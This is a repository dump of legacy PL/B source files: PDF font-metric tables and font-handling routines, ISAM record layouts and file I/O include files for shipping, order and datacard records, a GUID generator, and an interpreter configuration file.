"278,537,350,222,333,333,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,556,778,1000,365,889,278,222,611,944,611,0,0,0,0"
HelveticaBMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,333,474,556,556,889,722,278,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,333,333,584,584,584,611,975,722,722,722,722,667,":
"611,778,722,278,556,722,611,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,333,278,333,584,556,278,556,611,556,611,556,333,611,611,278,278,556,":
"278,889,611,611,611,611,389,556,333,611,556,778,556,556,500,389,280,389,584,":
"333,556,556,167,556,556,556,556,238,500,556,333,333,611,611,556,556,556,278,":
"556,350,278,500,500,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,611,778,1000,365,889,278,278,611,944,611,0,0,0,0"
HelveticaIMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,278,355,556,556,889,667,222,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,278,278,584,584,584,556,1015,667,667,722,722,667,":
"611,778,722,278,500,667,556,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,278,278,278,469,556,222,556,556,500,556,556,278,556,556,222,222,500,":
"222,833,556,556,556,556,333,500,278,556,500,722,500,500,500,334,260,334,584,":
"333,556,556,167,556,556,556,556,191,333,556,333,333,500,500,556,556,556,278,":
"537,350,222,333,333,556,1000,1000,611,333,333,333,333,333,333,333,333,333,333,":
"333,333,333,1000,1000,370,556,778,1000,365,889,278,222,611,944,611,0,0,0,0"
HelveticaBIMetric init "-100,50,-207,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,333,474,556,556,889,722,278,333,333,389,584,278,333,278,278,556,556,556,":
"556,556,556,556,556,556,556,333,333,584,584,584,611,975,722,722,722,722,667,":
"611,778,722,278,556,722,611,833,722,778,667,778,722,667,611,722,667,944,667,":
"667,611,333,278,333,584,556,278,556,611,556,611,556,333,611,611,278,278,556,":
"278,889,611,611,611,611,389,556,333,611,556,778,556,556,500,389,280,389,584,":
"333,556,556,167,556,556,556,556,238,500,556,333,333,611,611,556,556,556,278,":
"556,350,278,500,500,556,1000,1000,611,333,333,333,333,333,333,333,333,333,":
"333,333,333,333,1000,1000,370,611,778,1000,365,889,278,278,611,944,611,0,0,0,0"
CourierMetric init "-100,50,-157,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,":
"600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,600,0,0,0,0"
SymbolMetric INIT "-100,50,-293,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"250,333,713,500,549,833,778,439,333,333,500,549,250,549,250,278,500,500,500,":
"500,500,500,500,500,500,500,278,278,549,549,549,444,549,722,667,722,612,611,":
"763,603,722,333,631,722,686,889,722,722,768,741,556,592,611,690,439,768,645,":
"795,611,333,863,333,658,500,500,631,549,549,494,439,521,411,603,329,603,549,":
"549,576,521,549,549,521,549,603,439,576,713,686,493,686,494,480,200,480,549,":
"750,620,247,549,167,713,500,753,753,753,753,1042,987,603,987,603,400,549,411,":
"549,549,713,494,460,549,549,549,549,1000,603,1000,658,823,686,795,987,768,768,":
"823,768,768,713,713,713,713,713,713,713,768,713,790,790,890,823,549,250,713,":
"603,603,1042,987,603,987,603,494,329,790,790,786,713,384,384,384,384,384,384,":
"494,494,494,494,329,274,686,686,686,384,384,384,384,384,384,494,494,494,0"
ZapfDingbatsMetric init "-100,50,-143,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,":
"278,974,961,974,980,719,789,790,791,690,960,939,549,855,911,933,911,945,974,":
"755,846,762,761,571,677,763,760,759,754,494,552,537,577,692,786,788,788,790,":
"793,794,816,823,789,841,823,833,816,831,923,744,723,749,790,792,695,776,768,":
"792,759,707,708,682,701,826,815,789,789,707,687,696,689,786,787,713,791,785,":
"791,873,761,762,762,759,759,892,892,788,784,438,138,277,415,392,392,668,668,":
"390,390,317,317,276,276,509,509,410,410,234,234,334,334,732,544,544,910,667,":
"760,760,776,595,694,626,788,788,788,788,788,788,788,788,788,788,788,788,788,":
"788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,":
"788,788,788,788,788,788,788,788,894,838,1016,458,748,924,748,918,927,928,928,":
"834,873,828,924,924,917,930,931,463,883,836,836,867,867,696,696,874,874,760,":
"946,771,865,771,888,967,888,831,873,927,970,918,0"
.
MetricsA dim ^(14),(TimesMetric),(TimesBMetric),(TimesIMetric),(TimesBIMetric):
(HelveticaMetric),(HelveticaBMetric),(HelveticaIMetric),(HelveticaBIMetric):
(CourierMetric),(CourierMetric),(CourierMetric),(CourierMetric): // fixed font just re-use the same array
(SymbolMetric),(ZapfDingbatsMetric)
.
.
LastFntIdx form 2
.
. Select the current PDF font from a spec of the form "Name(size[,B][,I])".
. Resolves the base-14 font index, applies bold/italic offsets (Times,
. Helvetica, Courier families only), lazily emits the font dictionary
. object into 'fonts' on first use, loads the glyph metrics, and updates
. CurrentFont / CurFontRes (and the page's resource list) accordingly.
. Unknown names fall back to Courier; size 0 falls back to 12.
PDFFont FUNCTION
FontName dim 80
ENTRY
PDFFontName dim 80
char2 dim 2
attributes record
attrib1 dim 2
attrib2 dim 2
attrib3 dim 2
recordend
pdffontoffset form 1
content DIM 150
.
CLEAR fontsize,fontidx,usingttf
EXPLODE FontName,"(",PDFFontName // to-do... check for valid font
.
. Parse the "(size,B,I)" attribute list: whichever attribute is numeric
. becomes the size; "B"/"I" flags select the bold/italic variant.
IF not zero
EXPLODE FontName,",)",attributes
TYPE attributes.attrib1
IF EQUAL
MOVE attributes.attrib1,fontsize
ENDIF
TYPE attributes.attrib2
IF EQUAL
MOVE attributes.attrib2,fontsize
ENDIF
TYPE attributes.attrib3
IF EQUAL
MOVE attributes.attrib3,fontsize
ENDIF
IF (attributes.attrib1 = "B" or attributes.attrib2 = "B" or attributes.attrib3 = "B")
ADD "1",pdffontoffset // bold = pdffont array +1
ENDIF
IF (attributes.attrib1 = "I" or attributes.attrib2 = "I" or attributes.attrib3 = "I")
ADD "2",pdffontoffset // italic = pdffont array +2
ENDIF
ENDIF
.
IF (Fontsize=0)
MOVE "12",fontsize // default
ENDIF
.
SEARCH PDFFontName,pdffonts(1),"14",fontIdx
IF (fontIdx = 0)
MOVE "9",fontIdx //Courier(12) is default
CLEAR FontName
ENDIF
.
IF (FontIdx != 1 and FontIdx != 5 and FontIdx != 9)
CLEAR pdffontoffset // bold and italic only apply to 1 5 or 9
ELSE
ADD pdffontoffset,fontIdx
ENDIF
.
. First use of this font: assign resource/object numbers, load its
. metrics, and append the /Type1 font dictionary to the 'fonts' buffer.
IF (pdffontres(fontidx)=0)
.
EXPLODE MetricsA(fontIdx),",",FontMetrics
.
INCR ObjNum
INCR fontnum
MOVE fontnum,pdffontres(fontidx)
MOVE ObjNum,pdffontobj(fontidx)
.
SQUEEZE fontnum,char2
SQUEEZE objNum,scratch
PACK content,scratch," 0 obj",CRLF:
" << /Type /Font",CRLF:
" /Subtype /Type1",CRLF:
" /Name /F",char2,CRLF:
" /BaseFont /",pdffonts(fontIdx),CRLF:
" >>",CRLF:
"endobj",CRLF,CRLF
APPEND content,fonts
ELSE
. Already emitted: reuse its resource number, reloading metrics only
. when the font actually changed since the last call.
SQUEEZE pdfFontRes(fontidx),char2
IF (fontidx != LastFntIdx)
EXPLODE MetricsA(fontIdx),",",FontMetrics
ENDIF
MOVE fontidx,LastFntIdx
ENDIF
.
PACK CurrentFont,"/F",char2," ",fontsize," Tf"
.
. Record this font in the current page's resource dictionary once.
RESET page(curpage).fontres
SQUEEZE pdffontobj(fontidx),scratch
PACK CurFontRes,"/F",char2," ",scratch," 0 R "
SCAN CurFontRes,page(curpage).fontres
IF NOT EQUAL
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
ENDIF
.
FUNCTIONEND
.
. Switch the current font to its bold variant: even font indexes
. (2,4,6,8,10,12) are already bold faces, so return unchanged; otherwise
. the bold face sits at fontIdx+1 and is re-selected at the current size.
. NOTE(review): indexes 13/14 (Symbol/ZapfDingbats) are not guarded -
. calling this while Symbol is active would select ZapfDingbats.
PDFBoldOn FUNCTION
entry
boldfont dim 30
.
SELECT from fontIdx // check if already bold
WHEN "2" or "4" or "6" or "8" or "10" or "12"
RETURN
ENDSELECT
INCR fontIdx
PACK boldfont,pdffonts(fontIdx),"(",fontsize,")"
call PDFFont using boldfont
FUNCTIONEND
. Switch the current font back to its regular weight: odd font indexes
. (1,3,5,7,9,11) are the non-bold faces, so return unchanged; otherwise
. the regular face sits at fontIdx-1 and is re-selected at the current size.
PDFBoldOff FUNCTION
entry
boldfont dim 30
.
SELECT from fontIdx // check if bold already off
WHEN "1" or "3" or "5" or "7" or "9" or "11"
RETURN
ENDSELECT
DECR fontIdx
PACK boldfont,pdffonts(fontIdx),"(",fontsize,")"
call PDFFont using boldfont
FUNCTIONEND
.
. Turn underlining on by setting the 'ul' flag (presumably consulted by
. the text-drawing routines - defined outside this include; confirm).
PDFUnderLineOn FUNCTION
entry
SET ul
FUNCTIONEND
.
. Turn underlining off by clearing the 'ul' flag (see PDFUnderLineOn).
PDFUnderLineOff FUNCTION
entry
CLEAR ul
FUNCTIONEND
...........................................
.Text Metrics ... Get character widths
. metrics in AFM files ( and pdf font widths array ) are in glyph space
. glyph space is 1/1000th text space
. using default settings, text space is 72DPI
.
. I have not implemented anything to change default units
.
. character output width = glyph width * font size / 1000
.
. Load font metrics from an Adobe Font Metrics file "<FontName>.afm":
. picks up UnderlinePosition, UnderlineThickness and Descender from the
. header, then reads the StartCharMetrics section, storing each glyph's
. WX width into FontMetrics.GlyphWidths indexed by character code.
LoadFontMetricsFF LFUNCTION //From File
FontName DIM 40
ENTRY
afmname dim 250
afmfile file
data dim 100
CharMetrics record
char dim 7
width dim 12
name dim 40
box dim 25
recordend
startcharmetrics form 1
unit dim 2
chvalue form 3
wdtype dim 4
wdvalue form 5
.
CLEAR FontMetrics.GlyphWidths // discard old data
PACK afmname,FontName,".afm"
OPEN afmfile,afmname,read
LOOP
READ afmfile,seq;data
UNTIL OVER
.
. Header keywords: BUMP skips past the keyword, CHOP trims the value.
MATCH "UnderlinePosition ",data
IF EQUAL
BUMP data,18
CHOP data
MOVE data,FontMetrics.ulpos
ENDIF
.
MATCH "UnderlineThickness ",data
IF EQUAL
BUMP data,19
CHOP data
MOVE data,FontMetrics.ulpen
ENDIF
.
MATCH "Descender ",data // how far below baseline does the
IF EQUAL // font go? needed for underline pos
BUMP data,10
chop data
move data,FontMetrics.Descender
ENDIF
.
MATCH "StartCharMetrics ",data
IF EQUAL
SET startcharmetrics
CONTINUE
ENDIF
CONTINUE IF (startcharmetrics=0)
. glyph value
. Each metrics line is ';'-separated fields: "C nnn ; WX www ; N name ; B ..."
EXPLODE data,";",CharMetrics
PARSE CharMetrics.char,unit,"AZ" // C = decimal CH = hex
PARSENUM CharMetrics.char,chvalue // character value ( parsenum handles hex :D )
.
. not supporting named characters at this time
.
BREAK if (chvalue = seq) // -1 is named character instead of value
. char width
PARSE CharMetrics.width,wdtype,"AZ" // width type ( WX is what we want)
PARSENUM CharMetrics.width,wdvalue // width value
.
MATCH "WX ",wdtype
IF NOT EQUAL
MATCH "W1X ",wdtype
ENDIF
IF EQUAL
MOVE wdvalue,FontMetrics.GlyphWidths(chvalue)
ENDIF
.
REPEAT
CLOSE afmfile
.
FUNCTIONEND
.
.
. PDFMeasureString - return the rendered width of 'string' in text
. space units (72 DPI default): sum of glyph widths * fontsize / 1000
. using the currently loaded FontMetrics. The string's scan pointer
. is saved and restored so the caller's position is unchanged.
.
PDFMeasureString FUNCTION
string dim ^
 entry
char dim 1
cval integer 1
strlen form 5.3
fptr form 10
 MOVEFPTR string,fptr // remember caller's form pointer
 LOOP
 REMOVE string,char // take next character
 UNTIL EOS
 MOVE char,cval // character -> numeric glyph index
 ADD (FontMetrics.GlyphWidths(cval)*fontsize/1000),strlen
 REPEAT
 RESET string,fptr // restore caller's form pointer
 FUNCTIONEND USING strlen
<file_sep>/include/MDC035DD.inc
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - Category
.MDC091DD - Owner ???? data not supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
. MIN datacard category file (MDC_035): file handles and record layouts.
M035NAME Init "MDC_035.Isi|NINS1:502"
M035FLIST FileList
M035FILE IFILE Name="MDC_035.Isi|NINS1:502"
M035FILE2 IFILE Name="MDC_0352.Isi|NINS1:502"
 FileListEnd
M035SFILE FILE
.M035SFILE FILE Name="MDC_035.csv"
M035FLAG FORM 1
M035PATH FORM 1
M035Fld Dim 6
M035Fld2 Dim 8
.
. M035VARS: parsed/typed view of the record (CAT$ numeric).
M035VARS LIST .for ease I am using Min's names
CADCNO Dim 6 1-6 Card#
CASQNO Form 2 7-8 Category Seq#
CATC Dim 3 9-11 Category COde
CAT$ FOrm 5.2 12-19 Category DOllar
CATCHR dim 4 20-23 Category option -char
CATR Dim 1 24-24 Rate M/L
CATDSC Dim 25 29-49 Description
. NOTE(review): CATDSC is Dim 25 but 29-49 is only 21 bytes; 25-49
. would match Dim 25 - verify against the actual file layout.
 ListEnd
. M035VARS1: same record with every field as character (CCAT$ Dim).
M035VARS1 LIST .for ease I am using Min's names
CCADCNO Dim 6 1-6 Card#
CCASQNO Dim 2 7-8 Category Seq#
CCATC Dim 3 9-11 Category COde
CCAT$ Dim 7 12-19 Category DOllar
CCATCHR dim 4 20-23 Category option -char
CCATR Dim 1 24-24 Rate M/L
CCATDSC Dim 25 29-49 Description
 ListEnd
<file_sep>/include/Nshpio.inc
; Last change: ML 12 Oct 1998 7:52 am
..............................................................................
.
. NSHPIO INCLUSION
. NIN SHIPMENT FILE I/O ROUTINES
.
. REVISED 24JUL91 TO USE CA'S VARIABLES.
.
. FILE NAME : NINSHP
. REC LENGTH: 77 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.added
. 07Oct98 DLH shpvars, Tracking number
. 15Jul98 DLH add option file lock, record lock, no lock
..............................................................................
.
. ENTRY POINT : NSHPKEY
. REQUIRED : 'NSHPFLD'
. RETURNED : SHIPPING RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
. NSHPKEY: exact ISAM read by NSHPFLD into shpvars. All read entry
. points branch on NSHPLOCK: 0/1 = FILEPI file lock, 2 = record lock
. (file must have been opened LOCKMANUAL - see NSHPOPEN), 3 = no lock.
NSHPKEY BRANCH NSHPFLAG TO NSHP1
 CALL NSHPOPEN
NSHP1 branch nshplock to nshp1l,nshp1r,nshp1n
.with file locks
NSHP1L FILEPI 1;NSHPFILE
 READ NSHPFILE,NSHPFLD;shpvars
 RETURN
.with record locks . note file open must have had flag set
NSHP1R
 READLK NSHPFILE,NSHPFLD;shpvars
 RETURN
.no locks
NSHP1N
 READ NSHPFILE,NSHPFLD;shpvars
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPTST
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : ISAM KEY TEST READ
. (reads into STR1 only - positions/tests the key, record not parsed)
.
NSHPTST BRANCH NSHPFLAG TO NSHP2
 CALL NSHPOPEN
NSHP2 branch nshplock to nshp2l,nshp2r,nshp2n
NSHP2L FILEPI 1;NSHPFILE
 READ NSHPFILE,NSHPFLD;STR1
 RETURN
NSHP2R
 READLK NSHPFILE,NSHPFLD;STR1
 RETURN
NSHP2N
 READ NSHPFILE,NSHPFLD;STR1
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPKS
. REQUIRED :
. RETURNED : SHIPPING RECORD
. DESCRIPTION : KEY SEQUENTIAL SHIPPING FILE READ
.
NSHPKS BRANCH NSHPFLAG TO NSHP3
 CALL NSHPOPEN
NSHP3 branch nshplock to nshp3l,nshp3r,nshp3n
NSHP3L FILEPI 1;NSHPFILE
 READKS NSHPFILE;SHPVARS
 RETURN
NSHP3R
 READKSLK NSHPFILE;SHPVARS
 RETURN
NSHP3N
 READKS NSHPFILE;SHPVARS
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPSEQ
. REQUIRED :
. RETURNED : SHIPPING RECORD
. DESCRIPTION : SEQUENTIAL SHIPPING FILE READ
.
NSHPSEQ BRANCH NSHPFLAG TO NSHP4
 CALL NSHPOPEN
NSHP4 branch nshplock to nshp4l,nshp4r,nshp4n
NSHP4L FILEPI 1;NSHPFILE
 READ NSHPFILE,SEQ;SHPVARS
 RETURN
NSHP4R
 READLK NSHPFILE,SEQ;SHPVARS
 RETURN
NSHP4N
 READ NSHPFILE,SEQ;SHPVARS
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPWRT
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
. (write path has no no-lock branch: lock modes 0/1 use FILEPI,
. mode 2 relies on the LOCKMANUAL open)
.
NSHPWRT BRANCH NSHPFLAG TO NSHP5
 CALL NSHPOPEN
NSHP5 branch nshplock to nshp5l,nshp5r
NSHP5L FILEPI 1;NSHPFILE
 WRITE NSHPFILE,NSHPFLD;SHPVARS
 RETURN
NSHP5R
 WRITE NSHPFILE,NSHPFLD;SHPVARS
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST FILE
.
NSHPUPD BRANCH NSHPFLAG TO NSHP6
 CALL NSHPOPEN
NSHP6 branch nshplock to nshp6l,nshp6r
NSHP6L FILEPI 1;NSHPFILE
 UPDATE NSHPFILE;SHPVARS
 RETURN
NSHP6R
 UPDATE NSHPFILE;SHPVARS
 RETURN
..............................................................................
.
. ENTRY POINT : NSHPDEL
. REQUIRED : 'NSHPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
. (delete always runs under a FILEPI file lock)
.
NSHPDEL BRANCH NSHPFLAG TO NSHP7
 CALL NSHPOPEN
NSHP7 FILEPI 1;NSHPFILE
 DELETE NSHPFILE,NSHPFLD
 RETURN
...............................................................................
.
. ENTRY POINT : NSHPOPEN
. REQUIRED : 'NSHPFLAG'
. RETURNED : 'NSHPFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN SHIPPING FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
. (lock mode 2 opens LOCKMANUAL,SINGLE so READLK record locks work)
.
NSHPOPEN TRAP NSHPGONE IF IO
 BRANCH NshpLOCK TO NshpOPENl,NSHPOPENr
NSHPOPENl OPEN NSHPFILE,NSHPNAME
 TRAPCLR IO
 MOVE C1 TO NSHPFLAG
 RETURN
NSHPOPENR OPEN NSHPFILE,NSHPNAME,LOCKMANUAL,SINGLE
 TRAPCLR IO
 MOVE C1 TO NSHPFLAG
 RETURN
NSHPGONE MOVE NSHPNAME TO FILENAME
 CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/ListMarketsProject/Notes/guidgen.inc
//////////////////////////////////////////////////////////////////////////////
//
// PROGRAM: guidGen.inc
//
// AUTHOR: <NAME> (<EMAIL>)
//
// DATE: 03 NOV 2004
//
// PURPOSE: generates a random GUID for use as an ISAM key
//
// REVISION: 03 NOV 2004 VER01 MLYONS Created
//
//////////////////////////////////////////////////////////////////////////////
// working storage for generateGUID
#iwk1 integer 01
#hiByte integer 01
#loByte integer 01
#result integer 04
#cwk1 dim 01
#rawResult dim 16
#ASCIIresult dim 32
#GUID dim ^
// nibble -> hex digit lookup table
#hexData dim 01(0..15),("0"):
 ("1"):
 ("2"):
 ("3"):
 ("4"):
 ("5"):
 ("6"):
 ("7"):
 ("8"):
 ("9"):
 ("A"):
 ("B"):
 ("C"):
 ("D"):
 ("E"):
 ("F")
// Win32 CoCreateGuid (ole32.dll): fills 16 raw bytes with a new GUID
CoCreateGuid profile ole32:
 CoCreateGuid:
 int4:
 dim
//////////////////////////////////////////////////////////////////////////////
 goto #end
//////////////////////////////////////////////////////////////////////////////
// generateGUID: ask Windows for a GUID, hex-encode its 16 raw bytes
// (two hex digits per byte -> 32 chars), then format them into the
// canonical 8-4-4-4-12 dashed pattern returned in #GUID.
generateGUID routine #GUID
 winapi CoCreateGuid giving #result using #rawResult
 clear #ASCIIresult
 loop
 move #rawResult to #cwk1 // next raw byte
 move #cwk1 to #iwk1 // byte -> integer value
 divide "16" into #iwk1 giving #hiByte // high nibble
 calc #loByte = (#iwk1 - (#hiByte * 16)) // low nibble = remainder
 append #hexData(#hiByte) to #ASCIIresult
 append #hexData(#loByte) to #ASCIIresult
 bump #rawResult
 repeat until eos
 reset #ASCIIresult
 move "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" to #GUID
 edit #ASCIIresult into #GUID // fill the X positions, keep dashes
 return
//////////////////////////////////////////////////////////////////////////////
#end
//////////////////////////////////////////////////////////////////////////////
<file_sep>/include/nord5dd.inc
......................................
.nord5DD INCLUSION
.NIN supplemental Pending order Approval/Clearance ORDER FILE DEFINITION
.
.FILE NAME: NInord5
.REC LENGTH: 26 FIXED
.INDEX KEY: (1) 1-6 (LR#)
.
. Patch 1.2 Changed IP Address of File Manager DMB 18JUN05
. Patch 1.1 Added file to File Manager ASH 07AUG01
.
.START PATCH 1.1 REPLACED LOGIC
.nord5NAME INIT "NInord5"
.nord5NAME INIT "NINORD5.ISI|20.20.30.103:502"
nord5NAME INIT "NINORD5.ISI|NINS1:502"
.END PATCH 1.1 REPLACED LOGIC
nord5FILE IFILE KEYLEN=6,FIXED=26
nord5FLD DIM 6
nord5FLAG FORM 1
nord5PATH FORM 1
nord5LOCK FORM 1
.
.
. ORD5VARS: supplemental pending-order approval/clearance record,
. keyed by order LR number.
ORD5VARS LIST
nord5LR DIM 6 001-006 ORDER LR
nord5STAT DIM 2 007-008 APPROVAL STATUS
.
.0 OR " " = 4 = Approved
.1 = 1rst Request 5 = Cancelled
.2 = 2nd Request 6 = Pending
.3 = Revised Request 7 = Denied
.8 = Pending Internal
.9 = Tentative Approval
NORD5PDTE DIM 8 009-016 DATE ENTERED CCYYMMDD
.note actual order date changes to date approved (if approved)
nord5STA2 DIM 2 017-018 CLEARANCE STATUS
.see notes from sales
nord5CDTE DIM 8 019-026 DATE ENTERED CCYYMMDD
.note actual order date changes to date approved (if approved)
 LISTEND
<file_sep>/include/NLOBDD.INC
..............................................................................
.
. NlobDD INCLUSION
. NIN list owner balance FILE DEFINITION
.
. FILE NAME : NINlob
. REC LENGTH: 28 FIXED
. INDEX KEY : 1-16
..............................................................................
.
. NIN list-owner balance file: key is owner+list+century+year+month
. (bytes 1-16); lobbal is the balance for that owner/list/month.
NlobFILE IFILE KEYLEN=16,FIXED=28
NlobNAME INIT "NINlob "
NlobFLD DIM 16
NlobFLAG FORM 1
NlobPATH FORM 1
.
lobLON DIM 4 001-004 owner NUMBER
loblist dim 6 005-010 list number
lobCC DIM 2 011-012 century
lobYY DIM 2 013-014 year
lobMM DIM 2 015-016 month
lobbal form 9.2 017-028 balance
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/compnotesdd.inc
..............................................................................
.
. COMPNOTESDD INCLUSION
. COMPANY NOTES FILE DEFINITION
.
. FILE NAME : COMPNOTES
. REC LENGTH: 756
. INDEX KEY : 1-6
.
.DMB 03JUN2003 - FILE CREATED
..............................................................................
. Company notes file: one variable-length note record per company,
. keyed by 6-byte company number, no duplicate keys.
COMPNOTEFILE IFILE KEYLEN=6,VAR=756,NODUPLICATES,Name="COMPNOTES.ISI|NINS1:502"
COMPNOTENAME INIT "COMPNOTES.ISI|NINS1:502"
COMPNOTEFLD DIM 6
COMPNOTEFLAG FORM 1
COMPNOTELOCK FORM 1 0 or 1 = filepi, 2 = record locking, 3 = no locks
..............................................................................
COMPNOTEVARS list
COMPNOTECOMP DIM 6 1-6 COMPANY
COMPNOTES DIM 750 7-756 COMPANY NOTES
 listend
<file_sep>/DEVELOP/ListMarketsProject/Notes/plbwin.ini
[version]
Interpreter=8.7
[environment]
PLB_TERM=ansi
PLB_SYSTEM=C:\Sunbelt\plbwin.87\code
PLB_PATH=C:\localdev\nin\plb-bin;c:\localdev\nin\data\index;c:\localdev\nin\data\text;c:\localdev\nin\data;c:\localdev\nin\httemplates;c:\localdev\nin\src\backoffice
PLBCMP_OPT=-ZG
PLBCMP_OUT=C:\localdev\nin\plb-bin
PLB_PREP=C:\localdev\nin\data
[variables]
CGIHeader=c:\localdev\nin\htdocs\header.html
CGIFooter=c:\localdev\nin\htdocs\footer.html
[nin]
ADMIN_EMAIL=<EMAIL>
DNSSERVER0=172.16.31.10
DNSSERVER1=172.16.58.3
DNSSERVER2=172.16.17.32
RECSPERPAGE=20
SMTPSERVER=mx1.adjacency.net
<file_sep>/include/MDCTXTIO.inc
..............................................................................
.******************************************************
.* MTXT List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MTXT DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_Seg
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MTXT, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MTXTKEY
. REQUIRED : 'MTXTFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. MTXTKEY: exact ISAM read. MTXTPATH selects the physical file:
. path 0 -> MTXTFile/MTXTFld, path 1 -> MTXTFile2/MTXTFld2.
MTXTKEY Branch MTXTPATH to MTXT1a,Mtxt1c
MTXT1a BRANCH MTXTFlag TO MTXT1b
 CALL MTXTOpen
MTXT1b FILEPI 1;MTXTFile
 READ MTXTFile,MTXTFld;MTXTVars
 RETURN
MTXT1c BRANCH MTXTFlag TO MTXT1d
 CALL MTXTOpen
MTXT1d FILEPI 1;MTXTFile2
 READ MTXTFile2,MTXTFld2;MTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTTST
. REQUIRED : MTXTFld
. RETURNED :
. DESCRIPTION : TEST KEY (record read into STR1 only)
.
MTXTTST Branch MTXTPATH to MTXT2a,Mtxt2c
MTXT2a BRANCH MTXTFlag TO MTXT2b
 CALL MTXTOpen
MTXT2b FILEPI 1;MTXTFile
 READ MTXTFile,MTXTFld;STR1
 RETURN
MTXT2c BRANCH MTXTFlag TO MTXT2d
 CALL MTXTOpen
MTXT2d FILEPI 1;MTXTFile2
 READ MTXTFile2,MTXTFld2;STR1
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTKS
. REQUIRED :
. RETURNED : MTXT Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MTXTKS Branch MTXTPATH to MTXT3a,MTXT3c
MTXT3a BRANCH MTXTFlag TO MTXT3b
 CALL MTXTOpen
MTXT3b FILEPI 1;MTXTFile
 READKS MTXTFile;MTXTVars
 RETURN
MTXT3c BRANCH MTXTFlag TO MTXT3d
 CALL MTXTOpen
MTXT3d FILEPI 1;MTXTFile2
 READKS MTXTFile2;MTXTVars
 RETURN
..............................................................................
. ENTRY POINT : MTXTSEQ
. REQUIRED :
. RETURNED : MTXT Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ (primary file only)
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MTXTSEQ BRANCH MTXTFlag TO MTXT4
 CALL MTXTOpen
MTXT4 FILEPI 1;MTXTFile
 READ MTXTFile,SEQ;MTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTWRT
. REQUIRED : 'MTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
. (writes go through the filelist so all index files stay in step)
.
MTXTWRT BRANCH MTXTFlag TO MTXT5
 CALL MTXTOpen
MTXT5 FILEPI 1;MTXTFList
 WRITE MTXTFList;MTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
